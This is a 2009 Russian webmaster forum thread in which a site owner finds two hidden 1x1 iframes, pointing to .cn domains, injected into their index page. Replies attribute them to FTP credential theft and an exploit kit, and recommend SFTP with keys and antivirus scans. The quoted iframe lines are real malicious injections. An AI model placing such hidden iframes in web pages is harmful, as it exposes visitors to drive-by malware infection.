Master-X
Форум | Новости | Статьи
Главная » Форум » CJs » 
Тема: Вопрос о index.shtml
цитата
12/04/09 в 20:54
 arte
доделывал топ, надо было добавить кое что в индекс.схтмл, и случайным образом наткнулся на строчку в коде

<iframe src="http://lotante.cn/in.cgi?income38" width=1 height=1 style="visibility: hidden"></iframe>
<iframe src="http://thelotbet.cn/in.cgi?income40" width=1 height=1 style="visibility: hidden"></iframe>


вопос: откуда она там могла взяться? права вроде настроены так что индекс могу менять только я... если ктонить встречался с этим помогите плиз!
цитата
12/04/09 в 20:59
 Alexandur
Может пароль от ФТП свистнули. Сходи в венерологический.
цитата
12/04/09 в 21:34
 WASP
Это вирус 100%. Мне такую же хрень на всех сайтах на одном хосте повесили, задолбался чистить icon_evil.gif Антивир (нод не реагирует на него), загружает адоб ридер в процессы. Вопрос: как такое могли сделать? На сервере много доменов, каждый с разным фтп доступом.
цитата
12/04/09 в 21:45
 Yacc
LuckySploit
цитата
12/04/09 в 22:41
 rusawm
чекай свою систему локальную если на всех фтп аккаунтах так
цитата
13/04/09 в 01:23
 nosf
Тоже самое было. Трояном вытянули пароль к фтп видимо.
Добрые люди посоветовали авиру(http://www.free-av.com/) и всё стало впорядке, как после нода нашёл 35 вирусов icon_mrgreen.gif
Подумываю перейти на платную версию авиры icon_wink.gif
цитата
13/04/09 в 01:47
 kit
Ставь SFTP и оставляй доступ только со своего IP.
И все проблемы исчезнут.
цитата
13/04/09 в 01:48
 nosf
а если айпи динамический?)
цитата
13/04/09 в 02:58
 Stup
WASP писал:
Это вирус 100%. Мне такую же хрень на всех сайтах на одном хосте повесили, задолбался чистить icon_evil.gif Антивир (нод не реагирует на него), загружает адоб ридер в процессы. Вопрос: как такое могли сделать? На сервере много доменов, каждый с разным фтп доступом.


Делают обычно так - злоумышленник получает доступ к одному из фтп, заливает специальный пхп файл, запускает его через хттп, этот файл ищет и изменяет html файлы.
цитата
13/04/09 в 03:41
 lega_cobra
nosferatu писал:
а если айпи динамический?)


Делай доступ по ключам, а не по логину/паролю. Ключ можешь в USB token засунуть в неэкспортируемом виде, тогда точно никто никогда не стырит...
цитата
13/04/09 в 04:10
 Yacc
Сплоит относительно новый и в паблике его нет. Пока. )
Так что господа сиджеводы - готовьтесь.

Заражение происходит при посещении инфицированных страницы. Если при этом в браузере разрешено выполнение JScript и у вас есть права администратора, то вы попали. Однозначно.
И никакие антивирусы вас не спасут, так как это не просто "вирус" (если быть точным, то это вообще не вирус), а набор скриптов, эксплуатирующих различные актуальные уязвимости. И полагать, что после того как антивирус отрапортовал об удалении "вируса", вы чисты - просто наивно.
А если антивирус даже не среагировал и вы продолжали работать, то чего уж тогда удивлятся, что у вас утянули пароли.
Никакие баны по IP, как вы понимаете - не помогут, так как шелы заливаются с вашей машины.

Здесь список известных на сегодня атакующих серверов:
http://www.malwaredomainlist.com/mdl.php?inactive=&sort=Domain&…amp;page=0

Хочу ещё раз подчеркнуть, что ни один антивирус не сможет полностью удалить такую заразу, если вы работали под учётной записью администратора. А большинство из них даже не среагирует.
цитата
13/04/09 в 05:55
 Mad Knight
Yacc: Ебать страху то нагнал, я чуть винчь не отформатировал smail101.gif
цитата
13/04/09 в 22:53
 arte
Вчера почистил индекс, пока нормально, попозже посмотрим что будет.

На остальных доменах пока все спокойно...
цитата
14/04/09 в 00:14
 lega_cobra
Просто любопытно, хоть один чел перейдёт на sftp/RSA-key вместо FTP/логин-пароль? icon_smile.gif
цитата
14/04/09 в 01:12
 doomed

А что, кто-то еще использует ftp? smail101.gif
цитата
14/04/09 в 01:41
 mickey
на вебазилле все отфильтровано слава богу по дефолту icon_surprised.gif
цитата
14/04/09 в 01:44
 Yacc
А что кто-то ещё не знает о существование приватных сборок фтп-грабберов стоимостью $5k? icon_smile.gif
цитата
14/04/09 в 01:58
 mickey
кинь пару ссылок народу почитать, я тоже приватную сборку жигулей видел за двацатник
цитата
14/04/09 в 12:09
 Teval
оффтопик: всё же хорошая вещь - форум
если вдруг постучится к тебе трейдер какой нить новый, пробиваешь его ник на форумах, читаешь посты и отказываешь в трейде, либо просто не отвечаешьicon_smile.gif

ЗЫ: я не о тс icon_smile.gif
цитата
14/04/09 в 12:22
 mickey
нуда заранее себя документируют smail101.gif
цитата
14/04/09 в 16:56
 color
gimcnuk писал:
Может пароль от ФТП свистнули. Сходи в венерологический.

скорее через скрипты поломали
цитата
22/04/09 в 21:50
 dlk44
lega_cobra писал:
Просто любопытно, хоть один чел перейдёт на sftp/RSA-key вместо FTP/логин-пароль? icon_smile.gif


Нет.
цитата
22/04/09 в 21:53
 dlk44
Stup писал:
Делают обычно так - злоумышленник получает доступ к одному из фтп, заливает специальный пхп файл, запускает его через хттп, этот файл ищет и изменяет html файлы.


Это если на сервере так настроены виртуальные хосты что через PHP можно зайти в чужую папку. А если все НОРМАЛЬНО как нада настроено - то получив доступ к одному FTP только с файлами на этом FTP можно и орудовать.
цитата
22/04/09 в 21:54
 Woland
Цитата:
оффтопик: всё же хорошая вещь - форум
если вдруг постучится к тебе трейдер какой нить новый, пробиваешь его ник на форумах, читаешь посты и отказываешь в трейде, либо просто не отвечаешь

ЗЫ: я не о тс


Оффтопик: Думаю "чё-то Teval молчит в аське на вопрос о трейде, с чего бы ... " а он, оказывается, посты перечитывает smail101.gif
цитата
23/04/09 в 01:06
 color
dlk44 писал:
Нет.

почему нет? у нас процентов около 5 клиентов удалось перевести )) остальные не хотят )


Эта страница в полной версии